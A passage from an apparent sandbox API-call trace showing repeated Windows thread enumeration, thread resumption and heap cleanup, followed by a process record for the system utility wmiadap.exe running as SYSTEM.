lpte=0x212fa6c) returned 1 [0177.058] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.058] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.058] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.059] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.059] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.059] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.059] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.060] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.060] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.060] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.061] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.061] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.061] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.061] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.062] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.062] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.062] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.062] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.063] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.063] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.063] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.064] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.064] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.064] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.064] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.065] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.065] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.065] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.065] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.066] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.066] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.066] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.067] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.067] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.067] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.067] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.068] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.068] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.068] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.069] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.069] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.069] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.070] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.070] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.070] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.070] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.071] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.071] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.071] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.071] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.072] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.072] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.072] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.073] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.073] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.073] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.073] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.074] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.074] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.074] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.074] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.075] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.075] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.075] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.076] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.076] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.076] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.076] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.077] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.077] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.077] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.077] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.078] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.078] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.078] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.079] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.079] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.079] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.079] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.080] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.080] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.080] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.080] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.081] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.081] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.081] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.082] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0177.157] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc0) returned 0xa0 [0177.157] ResumeThread (hThread=0xa0) returned 0x1 [0177.157] CloseHandle (hObject=0xa0) returned 1 [0177.157] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x988) returned 0xa0 [0177.157] ResumeThread (hThread=0xa0) returned 0x1 [0177.157] CloseHandle (hObject=0xa0) returned 1 [0177.178] CloseHandle (hObject=0x9c) returned 1 [0177.203] VirtualQuery (in: lpAddress=0x7a1148, lpBuffer=0x212fa60, dwLength=0x1c | out: lpBuffer=0x212fa60*(BaseAddress=0x7a1000, AllocationBase=0x780000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.204] GetProcessHeap () returned 0x780000 [0177.204] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a1148 | out: hHeap=0x780000) returned 1 [0177.204] VirtualQuery (in: lpAddress=0x7a1038, lpBuffer=0x212fa60, dwLength=0x1c | out: lpBuffer=0x212fa60*(BaseAddress=0x7a1000, AllocationBase=0x780000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.204] GetProcessHeap () returned 0x780000 [0177.204] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a1038 | out: hHeap=0x780000) returned 1 [0177.204] RtlExitUserThread (Status=0x0) Process: id = "43" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x61b94000" os_pid = "0x5e4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x36c" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 301 os_tid = 0x5b4 Thread: id = 302 os_tid = 0x5c8 Thread: id = 304 os_tid = 0xab4 Thread: id = 305 os_tid = 0xac4 Thread: id = 306 os_tid = 0xac0 Thread: id = 307 os_tid = 0xabc